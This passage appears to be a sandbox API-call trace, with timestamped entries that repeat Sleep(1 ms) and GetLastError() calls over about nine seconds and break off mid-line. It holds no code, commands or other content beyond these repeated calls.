[0154.138] Sleep (dwMilliseconds=0x1) [0154.177] GetLastError () returned 0x0 [0154.177] Sleep (dwMilliseconds=0x1) [0154.197] GetLastError () returned 0x0 [0154.197] Sleep (dwMilliseconds=0x1) [0154.263] GetLastError () returned 0x0 [0154.263] Sleep (dwMilliseconds=0x1) [0154.338] GetLastError () returned 0x0 [0154.338] Sleep (dwMilliseconds=0x1) [0154.355] GetLastError () returned 0x0 [0154.355] Sleep (dwMilliseconds=0x1) [0154.388] GetLastError () returned 0x0 [0154.388] Sleep (dwMilliseconds=0x1) [0154.434] GetLastError () returned 0x0 [0154.434] Sleep (dwMilliseconds=0x1) [0154.459] GetLastError () returned 0x0 [0154.459] Sleep (dwMilliseconds=0x1) [0154.466] GetLastError () returned 0x0 [0154.466] Sleep (dwMilliseconds=0x1) [0154.481] GetLastError () returned 0x0 [0154.481] Sleep (dwMilliseconds=0x1) [0154.507] GetLastError () returned 0x0 [0154.507] Sleep (dwMilliseconds=0x1) [0154.532] GetLastError () returned 0x0 [0154.532] Sleep (dwMilliseconds=0x1) [0154.547] GetLastError () returned 0x0 [0154.547] Sleep (dwMilliseconds=0x1) [0154.559] GetLastError () returned 0x0 [0154.559] Sleep (dwMilliseconds=0x1) [0154.575] GetLastError () returned 0x0 [0154.575] Sleep (dwMilliseconds=0x1) [0154.601] GetLastError () returned 0x0 [0154.601] Sleep (dwMilliseconds=0x1) [0154.607] GetLastError () returned 0x0 [0154.607] Sleep (dwMilliseconds=0x1) [0154.642] GetLastError () returned 0x0 [0154.642] Sleep (dwMilliseconds=0x1) [0154.680] GetLastError () returned 0x0 [0154.680] Sleep (dwMilliseconds=0x1) [0154.707] GetLastError () returned 0x0 [0154.707] Sleep (dwMilliseconds=0x1) [0154.766] GetLastError () returned 0x0 [0154.766] Sleep (dwMilliseconds=0x1) [0154.893] GetLastError () returned 0x0 [0154.893] Sleep (dwMilliseconds=0x1) [0154.905] GetLastError () returned 0x0 [0154.905] Sleep (dwMilliseconds=0x1) [0154.934] GetLastError () returned 0x0 [0154.934] Sleep (dwMilliseconds=0x1) [0154.981] GetLastError () returned 0x0 [0154.981] Sleep (dwMilliseconds=0x1) [0155.051] GetLastError () returned 0x0 [0155.051] Sleep (dwMilliseconds=0x1) [0155.060] GetLastError () returned 0x0 [0155.060] Sleep (dwMilliseconds=0x1) [0155.076] GetLastError () returned 0x0 [0155.077] Sleep (dwMilliseconds=0x1) [0155.290] GetLastError () returned 0x0 [0155.290] Sleep (dwMilliseconds=0x1) [0155.294] GetLastError () returned 0x0 [0155.294] Sleep (dwMilliseconds=0x1) [0155.309] GetLastError () returned 0x0 [0155.309] Sleep (dwMilliseconds=0x1) [0155.337] GetLastError () returned 0x0 [0155.337] Sleep (dwMilliseconds=0x1) [0155.342] GetLastError () returned 0x0 [0155.342] Sleep (dwMilliseconds=0x1) [0155.371] GetLastError () returned 0x0 [0155.371] Sleep (dwMilliseconds=0x1) [0155.405] GetLastError () returned 0x0 [0155.405] Sleep (dwMilliseconds=0x1) [0155.440] GetLastError () returned 0x0 [0155.440] Sleep (dwMilliseconds=0x1) [0155.448] GetLastError () returned 0x0 [0155.449] Sleep (dwMilliseconds=0x1) [0155.481] GetLastError () returned 0x0 [0155.481] Sleep (dwMilliseconds=0x1) [0155.495] GetLastError () returned 0x0 [0155.495] Sleep (dwMilliseconds=0x1) [0155.526] GetLastError () returned 0x0 [0155.527] Sleep (dwMilliseconds=0x1) [0155.605] GetLastError () returned 0x0 [0155.605] Sleep (dwMilliseconds=0x1) [0155.686] GetLastError () returned 0x0 [0155.686] Sleep (dwMilliseconds=0x1) [0155.700] GetLastError () returned 0x0 [0155.700] Sleep (dwMilliseconds=0x1) [0155.715] GetLastError () returned 0x0 [0155.715] Sleep (dwMilliseconds=0x1) [0155.733] GetLastError () returned 0x0 [0155.733] Sleep (dwMilliseconds=0x1) [0155.751] GetLastError () returned 0x0 [0155.751] Sleep (dwMilliseconds=0x1) [0155.764] GetLastError () returned 0x0 [0155.764] Sleep (dwMilliseconds=0x1) [0155.779] GetLastError () returned 0x0 [0155.779] Sleep (dwMilliseconds=0x1) [0155.792] GetLastError () returned 0x0 [0155.792] Sleep (dwMilliseconds=0x1) [0155.839] GetLastError () returned 0x0 [0155.839] Sleep (dwMilliseconds=0x1) [0155.887] GetLastError () returned 0x0 [0155.887] Sleep (dwMilliseconds=0x1) [0155.948] GetLastError () returned 0x0 [0155.948] Sleep (dwMilliseconds=0x1) [0156.060] GetLastError () returned 0x0 [0156.060] Sleep (dwMilliseconds=0x1) [0156.106] GetLastError () returned 0x0 [0156.106] Sleep (dwMilliseconds=0x1) [0156.166] GetLastError () returned 0x0 [0156.166] Sleep (dwMilliseconds=0x1) [0156.188] GetLastError () returned 0x0 [0156.188] Sleep (dwMilliseconds=0x1) [0156.199] GetLastError () returned 0x0 [0156.199] Sleep (dwMilliseconds=0x1) [0156.213] GetLastError () returned 0x0 [0156.213] Sleep (dwMilliseconds=0x1) [0156.257] GetLastError () returned 0x0 [0156.257] Sleep (dwMilliseconds=0x1) [0156.260] GetLastError () returned 0x0 [0156.260] Sleep (dwMilliseconds=0x1) [0156.299] GetLastError () returned 0x0 [0156.299] Sleep (dwMilliseconds=0x1) [0156.356] GetLastError () returned 0x0 [0156.356] Sleep (dwMilliseconds=0x1) [0156.369] GetLastError () returned 0x0 [0156.369] Sleep (dwMilliseconds=0x1) [0156.385] GetLastError () returned 0x0 [0156.385] Sleep (dwMilliseconds=0x1) [0156.403] GetLastError () returned 0x0 [0156.403] Sleep (dwMilliseconds=0x1) [0156.431] GetLastError () returned 0x0 [0156.431] Sleep (dwMilliseconds=0x1) [0156.494] GetLastError () returned 0x0 [0156.494] Sleep (dwMilliseconds=0x1) [0156.535] GetLastError () returned 0x0 [0156.535] Sleep (dwMilliseconds=0x1) [0156.570] GetLastError () returned 0x0 [0156.570] Sleep (dwMilliseconds=0x1) [0156.603] GetLastError () returned 0x0 [0156.604] Sleep (dwMilliseconds=0x1) [0156.634] GetLastError () returned 0x0 [0156.634] Sleep (dwMilliseconds=0x1) [0156.667] GetLastError () returned 0x0 [0156.667] Sleep (dwMilliseconds=0x1) [0156.681] GetLastError () returned 0x0 [0156.681] Sleep (dwMilliseconds=0x1) [0156.727] GetLastError () returned 0x0 [0156.727] Sleep (dwMilliseconds=0x1) [0156.764] GetLastError () returned 0x0 [0156.764] Sleep (dwMilliseconds=0x1) [0156.853] GetLastError () returned 0x0 [0156.853] Sleep (dwMilliseconds=0x1) [0156.946] GetLastError () returned 0x0 [0156.946] Sleep (dwMilliseconds=0x1) [0157.055] GetLastError () returned 0x0 [0157.056] Sleep (dwMilliseconds=0x1) [0157.101] GetLastError () returned 0x0 [0157.101] Sleep (dwMilliseconds=0x1) [0157.106] GetLastError () returned 0x0 [0157.106] Sleep (dwMilliseconds=0x1) [0157.119] GetLastError () returned 0x0 [0157.119] Sleep (dwMilliseconds=0x1) [0157.136] GetLastError () returned 0x0 [0157.136] Sleep (dwMilliseconds=0x1) [0157.149] GetLastError () returned 0x0 [0157.149] Sleep (dwMilliseconds=0x1) [0157.166] GetLastError () returned 0x0 [0157.166] Sleep (dwMilliseconds=0x1) [0157.210] GetLastError () returned 0x0 [0157.210] Sleep (dwMilliseconds=0x1) [0157.212] GetLastError () returned 0x0 [0157.212] Sleep (dwMilliseconds=0x1) [0157.230] GetLastError () returned 0x0 [0157.230] Sleep (dwMilliseconds=0x1) [0157.243] GetLastError () returned 0x0 [0157.243] Sleep (dwMilliseconds=0x1) [0157.261] GetLastError () returned 0x0 [0157.261] Sleep (dwMilliseconds=0x1) [0157.282] GetLastError () returned 0x0 [0157.282] Sleep (dwMilliseconds=0x1) [0157.303] GetLastError () returned 0x0 [0157.303] Sleep (dwMilliseconds=0x1) [0157.313] GetLastError () returned 0x0 [0157.313] Sleep (dwMilliseconds=0x1) [0157.336] GetLastError () returned 0x0 [0157.336] Sleep (dwMilliseconds=0x1) [0157.383] GetLastError () returned 0x0 [0157.383] Sleep (dwMilliseconds=0x1) [0157.419] GetLastError () returned 0x0 [0157.419] Sleep (dwMilliseconds=0x1) [0157.445] GetLastError () returned 0x0 [0157.445] Sleep (dwMilliseconds=0x1) [0157.474] GetLastError () returned 0x0 [0157.474] Sleep (dwMilliseconds=0x1) [0157.502] GetLastError () returned 0x0 [0157.502] Sleep (dwMilliseconds=0x1) [0157.524] GetLastError () returned 0x0 [0157.524] Sleep (dwMilliseconds=0x1) [0157.554] GetLastError () returned 0x0 [0157.554] Sleep (dwMilliseconds=0x1) [0157.602] GetLastError () returned 0x0 [0157.602] Sleep (dwMilliseconds=0x1) [0157.670] GetLastError () returned 0x0 [0157.670] Sleep (dwMilliseconds=0x1) [0157.710] GetLastError () returned 0x0 [0157.710] Sleep (dwMilliseconds=0x1) [0157.726] GetLastError () returned 0x0 [0157.726] Sleep (dwMilliseconds=0x1) [0157.742] GetLastError () returned 0x0 [0157.742] Sleep (dwMilliseconds=0x1) [0157.757] GetLastError () returned 0x0 [0157.757] Sleep (dwMilliseconds=0x1) [0157.773] GetLastError () returned 0x0 [0157.773] Sleep (dwMilliseconds=0x1) [0157.789] GetLastError () returned 0x0 [0157.789] Sleep (dwMilliseconds=0x1) [0157.804] GetLastError () returned 0x0 [0157.804] Sleep (dwMilliseconds=0x1) [0157.820] GetLastError () returned 0x0 [0157.820] Sleep (dwMilliseconds=0x1) [0157.835] GetLastError () returned 0x0 [0157.835] Sleep (dwMilliseconds=0x1) [0157.851] GetLastError () returned 0x0 [0157.851] Sleep (dwMilliseconds=0x1) [0157.867] GetLastError () returned 0x0 [0157.867] Sleep (dwMilliseconds=0x1) [0157.884] GetLastError () returned 0x0 [0157.884] Sleep (dwMilliseconds=0x1) [0157.898] GetLastError () returned 0x0 [0157.898] Sleep (dwMilliseconds=0x1) [0157.913] GetLastError () returned 0x0 [0157.913] Sleep (dwMilliseconds=0x1) [0157.950] GetLastError () returned 0x0 [0157.950] Sleep (dwMilliseconds=0x1) [0157.960] GetLastError () returned 0x0 [0157.960] Sleep (dwMilliseconds=0x1) [0158.041] GetLastError () returned 0x0 [0158.041] Sleep (dwMilliseconds=0x1) [0158.077] GetLastError () returned 0x0 [0158.078] Sleep (dwMilliseconds=0x1) [0158.095] GetLastError () returned 0x0 [0158.095] Sleep (dwMilliseconds=0x1) [0158.103] GetLastError () returned 0x0 [0158.103] Sleep (dwMilliseconds=0x1) [0158.116] GetLastError () returned 0x0 [0158.116] Sleep (dwMilliseconds=0x1) [0158.152] GetLastError () returned 0x0 [0158.152] Sleep (dwMilliseconds=0x1) [0158.163] GetLastError () returned 0x0 [0158.163] Sleep (dwMilliseconds=0x1) [0158.178] GetLastError () returned 0x0 [0158.178] Sleep (dwMilliseconds=0x1) [0158.194] GetLastError () returned 0x0 [0158.194] Sleep (dwMilliseconds=0x1) [0158.210] GetLastError () returned 0x0 [0158.210] Sleep (dwMilliseconds=0x1) [0158.231] GetLastError () returned 0x0 [0158.231] Sleep (dwMilliseconds=0x1) [0158.241] GetLastError () returned 0x0 [0158.241] Sleep (dwMilliseconds=0x1) [0158.257] GetLastError () returned 0x0 [0158.257] Sleep (dwMilliseconds=0x1) [0158.272] GetLastError () returned 0x0 [0158.272] Sleep (dwMilliseconds=0x1) [0158.289] GetLastError () returned 0x0 [0158.289] Sleep (dwMilliseconds=0x1) [0158.311] GetLastError () returned 0x0 [0158.311] Sleep (dwMilliseconds=0x1) [0158.360] GetLastError () returned 0x0 [0158.360] Sleep (dwMilliseconds=0x1) [0158.430] GetLastError () returned 0x0 [0158.430] Sleep (dwMilliseconds=0x1) [0158.444] GetLastError () returned 0x0 [0158.444] Sleep (dwMilliseconds=0x1) [0158.483] GetLastError () returned 0x0 [0158.483] Sleep (dwMilliseconds=0x1) [0158.519] GetLastError () returned 0x0 [0158.519] Sleep (dwMilliseconds=0x1) [0158.580] GetLastError () returned 0x0 [0158.580] Sleep (dwMilliseconds=0x1) [0158.616] GetLastError () returned 0x0 [0158.616] Sleep (dwMilliseconds=0x1) [0158.631] GetLastError () returned 0x0 [0158.631] Sleep (dwMilliseconds=0x1) [0158.647] GetLastError () returned 0x0 [0158.647] Sleep (dwMilliseconds=0x1) [0158.662] GetLastError () returned 0x0 [0158.662] Sleep (dwMilliseconds=0x1) [0158.678] GetLastError () returned 0x0 [0158.678] Sleep (dwMilliseconds=0x1) [0158.693] GetLastError () returned 0x0 [0158.693] Sleep (dwMilliseconds=0x1) [0158.709] GetLastError () returned 0x0 [0158.709] Sleep (dwMilliseconds=0x1) [0158.725] GetLastError () returned 0x0 [0158.725] Sleep (dwMilliseconds=0x1) [0158.740] GetLastError () returned 0x0 [0158.740] Sleep (dwMilliseconds=0x1) [0158.756] GetLastError () returned 0x0 [0158.756] Sleep (dwMilliseconds=0x1) [0158.771] GetLastError () returned 0x0 [0158.771] Sleep (dwMilliseconds=0x1) [0158.787] GetLastError () returned 0x0 [0158.787] Sleep (dwMilliseconds=0x1) [0158.803] GetLastError () returned 0x0 [0158.803] Sleep (dwMilliseconds=0x1) [0158.818] GetLastError () returned 0x0 [0158.818] Sleep (dwMilliseconds=0x1) [0158.834] GetLastError () returned 0x0 [0158.834] Sleep (dwMilliseconds=0x1) [0158.849] GetLastError () returned 0x0 [0158.849] Sleep (dwMilliseconds=0x1) [0158.865] GetLastError () returned 0x0 [0158.865] Sleep (dwMilliseconds=0x1) [0158.881] GetLastError () returned 0x0 [0158.881] Sleep (dwMilliseconds=0x1) [0158.896] GetLastError () returned 0x0 [0158.896] Sleep (dwMilliseconds=0x1) [0158.912] GetLastError () returned 0x0 [0158.912] Sleep (dwMilliseconds=0x1) [0158.927] GetLastError () returned 0x0 [0158.927] Sleep (dwMilliseconds=0x1) [0158.944] GetLastError () returned 0x0 [0158.944] Sleep (dwMilliseconds=0x1) [0158.959] GetLastError () returned 0x0 [0158.959] Sleep (dwMilliseconds=0x1) [0159.027] GetLastError () returned 0x0 [0159.027] Sleep (dwMilliseconds=0x1) [0159.037] GetLastError () returned 0x0 [0159.037] Sleep (dwMilliseconds=0x1) [0159.053] GetLastError () returned 0x0 [0159.053] Sleep (dwMilliseconds=0x1) [0159.068] GetLastError () returned 0x0 [0159.068] Sleep (dwMilliseconds=0x1) [0159.083] GetLastError () returned 0x0 [0159.083] Sleep (dwMilliseconds=0x1) [0159.099] GetLastError () returned 0x0 [0159.099] Sleep (dwMilliseconds=0x1) [0159.115] GetLastError () returned 0x0 [0159.115] Sleep (dwMilliseconds=0x1) [0159.130] GetLastError () returned 0x0 [0159.130] Sleep (dwMilliseconds=0x1) [0159.146] GetLastError () returned 0x0 [0159.146] Sleep (dwMilliseconds=0x1) [0159.161] GetLastError () returned 0x0 [0159.161] Sleep (dwMilliseconds=0x1) [0159.177] GetLastError () returned 0x0 [0159.177] Sleep (dwMilliseconds=0x1) [0159.193] GetLastError () returned 0x0 [0159.194] Sleep (dwMilliseconds=0x1) [0159.223] GetLastError () returned 0x0 [0159.223] Sleep (dwMilliseconds=0x1) [0159.237] GetLastError () returned 0x0 [0159.237] Sleep (dwMilliseconds=0x1) [0159.239] GetLastError () returned 0x0 [0159.239] Sleep (dwMilliseconds=0x1) [0159.255] GetLastError () returned 0x0 [0159.255] Sleep (dwMilliseconds=0x1) [0159.271] GetLastError () returned 0x0 [0159.271] Sleep (dwMilliseconds=0x1) [0159.286] GetLastError () returned 0x0 [0159.286] Sleep (dwMilliseconds=0x1) [0159.303] GetLastError () returned 0x0 [0159.303] Sleep (dwMilliseconds=0x1) [0159.326] GetLastError () returned 0x0 [0159.326] Sleep (dwMilliseconds=0x1) [0159.333] GetLastError () returned 0x0 [0159.333] Sleep (dwMilliseconds=0x1) [0159.349] GetLastError () returned 0x0 [0159.349] Sleep (dwMilliseconds=0x1) [0159.364] GetLastError () returned 0x0 [0159.364] Sleep (dwMilliseconds=0x1) [0159.380] GetLastError () returned 0x0 [0159.380] Sleep (dwMilliseconds=0x1) [0159.395] GetLastError () returned 0x0 [0159.395] Sleep (dwMilliseconds=0x1) [0159.411] GetLastError () returned 0x0 [0159.411] Sleep (dwMilliseconds=0x1) [0159.427] GetLastError () returned 0x0 [0159.427] Sleep (dwMilliseconds=0x1) [0159.442] GetLastError () returned 0x0 [0159.442] Sleep (dwMilliseconds=0x1) [0159.458] GetLastError () returned 0x0 [0159.458] Sleep (dwMilliseconds=0x1) [0159.474] GetLastError () returned 0x0 [0159.474] Sleep (dwMilliseconds=0x1) [0159.489] GetLastError () returned 0x0 [0159.489] Sleep (dwMilliseconds=0x1) [0159.506] GetLastError () returned 0x0 [0159.506] Sleep (dwMilliseconds=0x1) [0159.523] GetLastError () returned 0x0 [0159.523] Sleep (dwMilliseconds=0x1) [0159.548] GetLastError () returned 0x0 [0159.548] Sleep (dwMilliseconds=0x1) [0159.552] GetLastError () returned 0x0 [0159.552] Sleep (dwMilliseconds=0x1) [0159.567] GetLastError () returned 0x0 [0159.567] Sleep (dwMilliseconds=0x1) [0159.583] GetLastError () returned 0x0 [0159.583] Sleep (dwMilliseconds=0x1) [0159.626] GetLastError () returned 0x0 [0159.626] Sleep (dwMilliseconds=0x1) [0159.661] GetLastError () returned 0x0 [0159.661] Sleep (dwMilliseconds=0x1) [0159.754] GetLastError () returned 0x0 [0159.754] Sleep (dwMilliseconds=0x1) [0159.801] GetLastError () returned 0x0 [0159.801] Sleep (dwMilliseconds=0x1) [0159.822] GetLastError () returned 0x0 [0159.822] Sleep (dwMilliseconds=0x1) [0159.832] GetLastError () returned 0x0 [0159.832] Sleep (dwMilliseconds=0x1) [0159.848] GetLastError () returned 0x0 [0159.848] Sleep (dwMilliseconds=0x1) [0159.880] GetLastError () returned 0x0 [0159.880] Sleep (dwMilliseconds=0x1) [0159.926] GetLastError () returned 0x0 [0159.926] Sleep (dwMilliseconds=0x1) [0159.963] GetLastError () returned 0x0 [0159.963] Sleep (dwMilliseconds=0x1) [0160.105] GetLastError () returned 0x0 [0160.105] Sleep (dwMilliseconds=0x1) [0160.146] GetLastError () returned 0x0 [0160.146] Sleep (dwMilliseconds=0x1) [0160.166] GetLastError () returned 0x0 [0160.166] Sleep (dwMilliseconds=0x1) [0160.175] GetLastError () returned 0x0 [0160.175] Sleep (dwMilliseconds=0x1) [0160.232] GetLastError () returned 0x0 [0160.232] Sleep (dwMilliseconds=0x1) [0160.313] GetLastError () returned 0x0 [0160.313] Sleep (dwMilliseconds=0x1) [0160.357] GetLastError () returned 0x0 [0160.357] Sleep (dwMilliseconds=0x1) [0160.364] GetLastError () returned 0x0 [0160.364] Sleep (dwMilliseconds=0x1) [0160.432] GetLastError () returned 0x0 [0160.432] Sleep (dwMilliseconds=0x1) [0160.504] GetLastError () returned 0x0 [0160.504] Sleep (dwMilliseconds=0x1) [0160.580] GetLastError () returned 0x0 [0160.580] Sleep (dwMilliseconds=0x1) [0160.656] GetLastError () returned 0x0 [0160.656] Sleep (dwMilliseconds=0x1) [0160.732] GetLastError () returned 0x0 [0160.732] Sleep (dwMilliseconds=0x1) [0160.809] GetLastError () returned 0x0 [0160.809] Sleep (dwMilliseconds=0x1) [0160.884] GetLastError () returned 0x0 [0160.884] Sleep (dwMilliseconds=0x1) [0160.958] GetLastError () returned 0x0 [0160.958] Sleep (dwMilliseconds=0x1) [0161.031] GetLastError () returned 0x0 [0161.031] Sleep (dwMilliseconds=0x1) [0161.180] GetLastError () returned 0x0 [0161.180] Sleep (dwMilliseconds=0x1) [0161.239] GetLastError () returned 0x0 [0161.239] Sleep (dwMilliseconds=0x1) [0161.291] GetLastError () returned 0x0 [0161.291] Sleep (dwMilliseconds=0x1) [0161.310] GetLastError () returned 0x0 [0161.310] Sleep (dwMilliseconds=0x1) [0161.327] GetLastError () returned 0x0 [0161.327] Sleep (dwMilliseconds=0x1) [0161.481] GetLastError () returned 0x0 [0161.481] Sleep (dwMilliseconds=0x1) [0161.492] GetLastError () returned 0x0 [0161.492] Sleep (dwMilliseconds=0x1) [0161.564] GetLastError () returned 0x0 [0161.564] Sleep (dwMilliseconds=0x1) [0161.612] GetLastError () returned 0x0 [0161.612] Sleep (dwMilliseconds=0x1) [0161.626] GetLastError () returned 0x0 [0161.626] Sleep (dwMilliseconds=0x1) [0161.642] GetLastError () returned 0x0 [0161.642] Sleep (dwMilliseconds=0x1) [0161.658] GetLastError () returned 0x0 [0161.658] Sleep (dwMilliseconds=0x1) [0161.673] GetLastError () returned 0x0 [0161.673] Sleep (dwMilliseconds=0x1) [0161.689] GetLastError () returned 0x0 [0161.689] Sleep (dwMilliseconds=0x1) [0161.706] GetLastError () returned 0x0 [0161.706] Sleep (dwMilliseconds=0x1) [0161.720] GetLastError () returned 0x0 [0161.720] Sleep (dwMilliseconds=0x1) [0161.735] GetLastError () returned 0x0 [0161.735] Sleep (dwMilliseconds=0x1) [0161.752] GetLastError () returned 0x0 [0161.752] Sleep (dwMilliseconds=0x1) [0161.799] GetLastError () returned 0x0 [0161.800] Sleep (dwMilliseconds=0x1) [0161.813] GetLastError () returned 0x0 [0161.813] Sleep (dwMilliseconds=0x1) [0161.829] GetLastError () returned 0x0 [0161.829] Sleep (dwMilliseconds=0x1) [0161.844] GetLastError () returned 0x0 [0161.844] Sleep (dwMilliseconds=0x1) [0161.860] GetLastError () returned 0x0 [0161.860] Sleep (dwMilliseconds=0x1) [0161.876] GetLastError () returned 0x0 [0161.876] Sleep (dwMilliseconds=0x1) [0161.891] GetLastError () returned 0x0 [0161.891] Sleep (dwMilliseconds=0x1) [0161.907] GetLastError () returned 0x0 [0161.907] Sleep (dwMilliseconds=0x1) [0161.922] GetLastError () returned 0x0 [0161.923] Sleep (dwMilliseconds=0x1) [0161.938] GetLastError () returned 0x0 [0161.938] Sleep (dwMilliseconds=0x1) [0161.954] GetLastError () returned 0x0 [0161.954] Sleep (dwMilliseconds=0x1) [0161.969] GetLastError () returned 0x0 [0161.969] Sleep (dwMilliseconds=0x1) [0161.985] GetLastError () returned 0x0 [0161.985] Sleep (dwMilliseconds=0x1) [0162.002] GetLastError () returned 0x0 [0162.002] Sleep (dwMilliseconds=0x1) [0162.016] GetLastError () returned 0x0 [0162.016] Sleep (dwMilliseconds=0x1) [0162.032] GetLastError () returned 0x0 [0162.032] Sleep (dwMilliseconds=0x1) [0162.048] GetLastError () returned 0x0 [0162.048] Sleep (dwMilliseconds=0x1) [0162.063] GetLastError () returned 0x0 [0162.063] Sleep (dwMilliseconds=0x1) [0162.129] GetLastError () returned 0x0 [0162.129] Sleep (dwMilliseconds=0x1) [0162.141] GetLastError () returned 0x0 [0162.141] Sleep (dwMilliseconds=0x1) [0162.159] GetLastError () returned 0x0 [0162.160] Sleep (dwMilliseconds=0x1) [0162.172] GetLastError () returned 0x0 [0162.172] Sleep (dwMilliseconds=0x1) [0162.188] GetLastError () returned 0x0 [0162.188] Sleep (dwMilliseconds=0x1) [0162.203] GetLastError () returned 0x0 [0162.203] Sleep (dwMilliseconds=0x1) [0162.248] GetLastError () returned 0x0 [0162.248] Sleep (dwMilliseconds=0x1) [0162.251] GetLastError () returned 0x0 [0162.251] Sleep (dwMilliseconds=0x1) [0162.266] GetLastError () returned 0x0 [0162.266] Sleep (dwMilliseconds=0x1) [0162.281] GetLastError () returned 0x0 [0162.281] Sleep (dwMilliseconds=0x1) [0162.297] GetLastError () returned 0x0 [0162.297] Sleep (dwMilliseconds=0x1) [0162.313] GetLastError () returned 0x0 [0162.313] Sleep (dwMilliseconds=0x1) [0162.330] GetLastError () returned 0x0 [0162.330] Sleep (dwMilliseconds=0x1) [0162.344] GetLastError () returned 0x0 [0162.344] Sleep (dwMilliseconds=0x1) [0162.359] GetLastError () returned 0x0 [0162.359] Sleep (dwMilliseconds=0x1) [0162.375] GetLastError () returned 0x0 [0162.375] Sleep (dwMilliseconds=0x1) [0162.390] GetLastError () returned 0x0 [0162.390] Sleep (dwMilliseconds=0x1) [0162.406] GetLastError () returned 0x0 [0162.406] Sleep (dwMilliseconds=0x1) [0162.422] GetLastError () returned 0x0 [0162.422] Sleep (dwMilliseconds=0x1) [0162.437] GetLastError () returned 0x0 [0162.437] Sleep (dwMilliseconds=0x1) [0162.453] GetLastError () returned 0x0 [0162.453] Sleep (dwMilliseconds=0x1) [0162.469] GetLastError () returned 0x0 [0162.469] Sleep (dwMilliseconds=0x1) [0162.485] GetLastError () returned 0x0 [0162.485] Sleep (dwMilliseconds=0x1) [0162.500] GetLastError () returned 0x0 [0162.500] Sleep (dwMilliseconds=0x1) [0162.515] GetLastError () returned 0x0 [0162.515] Sleep (dwMilliseconds=0x1) [0162.531] GetLastError () returned 0x0 [0162.531] Sleep (dwMilliseconds=0x1) [0162.546] GetLastError () returned 0x0 [0162.546] Sleep (dwMilliseconds=0x1) [0162.562] GetLastError () returned 0x0 [0162.562] Sleep (dwMilliseconds=0x1) [0162.578] GetLastError () returned 0x0 [0162.578] Sleep (dwMilliseconds=0x1) [0162.593] GetLastError () returned 0x0 [0162.593] Sleep (dwMilliseconds=0x1) [0162.609] GetLastError () returned 0x0 [0162.609] Sleep (dwMilliseconds=0x1) [0162.625] GetLastError () returned 0x0 [0162.625] Sleep (dwMilliseconds=0x1) [0162.640] GetLastError () returned 0x0 [0162.640] Sleep (dwMilliseconds=0x1) [0162.656] GetLastError () returned 0x0 [0162.656] Sleep (dwMilliseconds=0x1) [0162.671] GetLastError () returned 0x0 [0162.671] Sleep (dwMilliseconds=0x1) [0162.687] GetLastError () returned 0x0 [0162.687] Sleep (dwMilliseconds=0x1) [0162.703] GetLastError () returned 0x0 [0162.703] Sleep (dwMilliseconds=0x1) [0162.718] GetLastError () returned 0x0 [0162.718] Sleep (dwMilliseconds=0x1) [0162.734] GetLastError () returned 0x0 [0162.734] Sleep (dwMilliseconds=0x1) [0162.749] GetLastError () returned 0x0 [0162.749] Sleep (dwMilliseconds=0x1) [0162.765] GetLastError () returned 0x0 [0162.765] Sleep (dwMilliseconds=0x1) [0162.781] GetLastError () returned 0x0 [0162.781] Sleep (dwMilliseconds=0x1) [0162.796] GetLastError () returned 0x0 [0162.796] Sleep (dwMilliseconds=0x1) [0162.812] GetLastError () returned 0x0 [0162.812] Sleep (dwMilliseconds=0x1) [0162.827] GetLastError () returned 0x0 [0162.827] Sleep (dwMilliseconds=0x1) [0162.843] GetLastError () returned 0x0 [0162.843] Sleep (dwMilliseconds=0x1) [0162.858] GetLastError () returned 0x0 [0162.858] Sleep (dwMilliseconds=0x1) [0162.876] GetLastError () returned 0x0 [0162.876] Sleep (dwMilliseconds=0x1) [0162.890] GetLastError () returned 0x0 [0162.890] Sleep (dwMilliseconds=0x1) [0162.906] GetLastError () returned 0x0 [0162.906] Sleep (dwMilliseconds=0x1) [0162.921] GetLastError () returned 0x0 [0162.921] Sleep (dwMilliseconds=0x1) [0162.937] GetLastError () returned 0x0 [0162.937] Sleep (dwMilliseconds=0x1) [0162.952] GetLastError () returned 0x0 [0162.952] Sleep (dwMilliseconds=0x1) [0162.968] GetLastError () returned 0x0 [0162.968] Sleep (dwMilliseconds=0x1) [0162.983] GetLastError () returned 0x0 [0162.983] Sleep (dwMilliseconds=0x1) [0162.999] GetLastError () returned 0x0 [0162.999] Sleep (dwMilliseconds=0x1) [0163.015] GetLastError () returned 0x0 [0163.015] Sleep (dwMilliseconds=0x1) [0163.030] GetLastError () returned 0x0 [0163.030] Sleep (dwMilliseconds=0x1) [0163.046] GetLastError () returned 0x0 [0163.046] Sleep (dwMilliseconds=0x1) [0163.061] GetLastError () returned 0x0 [0163.061] Sleep (dwMilliseconds=0x1) [0163.129] GetLastError () returned 0x0 [0163.129] Sleep (dwMilliseconds=0x1) [0163.139] GetLastError () returned 0x0 [0163.139] Sleep (dwMilliseconds=0x1) [0163.155] GetLastError () returned 0x0 [0163.155] Sleep (dwMilliseconds=0x1) [0163.170] GetLastError () returned 0x0 [0163.170] Sleep (dwMilliseconds=0x1) [0163.186] GetLastError () returned 0x0 [0163.186] Sleep (dwMilliseconds=0x1) [0163.202] GetLastError () returned 0x0 [0163.202] Sleep (dwMilliseconds=0x1) [0163.217] GetLastError () returned 0x0 [0163.217] Sleep (dwMilliseconds=0x1) [0163.233] GetLastError () returned 0x0 [0163.233] Sleep (dwMilliseconds=0x1) [0163.248] GetLastError () returned 0x0 [0163.248] Sleep (dwMilliseconds=0x1) [0163.266] GetLastError () returned 0x0 [0163.266] Sleep (dwMilliseconds=0x1) [0163.280] GetLastError () returned 0x0 [0163.280] Sleep (dwMilliseconds=0x1) [0163.295] GetLastError () returned 0x0 [0163.295] Sleep (dwMilliseconds=0x1) [0163.312] GetLastError () returned 0x0 [0163.313] Sleep (dwMilliseconds=0x1) [0163.326] GetLastError () returned 0x0 [0163.326] Sleep (dwMilliseconds=0x1) [0163.342] GetLastError () returned 0x0 [0163.342] Sleep (dwMilliseconds=0x1) [0163.358] GetLastError () returned 0x0 [0163.358] Sleep (dwMilliseconds=0x1) [0163.637] GetLastError () returned 0x0 [0163.637] Sleep (dwMilliseconds=0x1) [0163.638] GetLastError () returned 0x0 [0163.638] Sleep (dwMilliseconds=0x1) [0163.654] GetLastError () returned 0x0 [0163.654] Sleep (dwMilliseconds=0x1) [0163.670] GetLastError () returned 0x0 [0163.670] Sleep (dwMilliseconds=0x1) [0163.685] GetLastError () returned 0x0 [0163.685] Sleep (dwMilliseconds=0x1) [0163.701] GetLastError () returned 0x0 [0163.701] Sleep (dwMilliseconds=0x1) [0163.717] GetLastError () returned 0x0 [0163.717] Sleep (dwMilliseconds=0x1) [0163.732] GetLastError () returned 0x0 [0163.732] Sleep (dwMilliseconds=0x1) [0163.748] GetLastError () returned 0x0 [0163.748] Sleep (dwMilliseconds=0x1) [0163.765] GetLastError 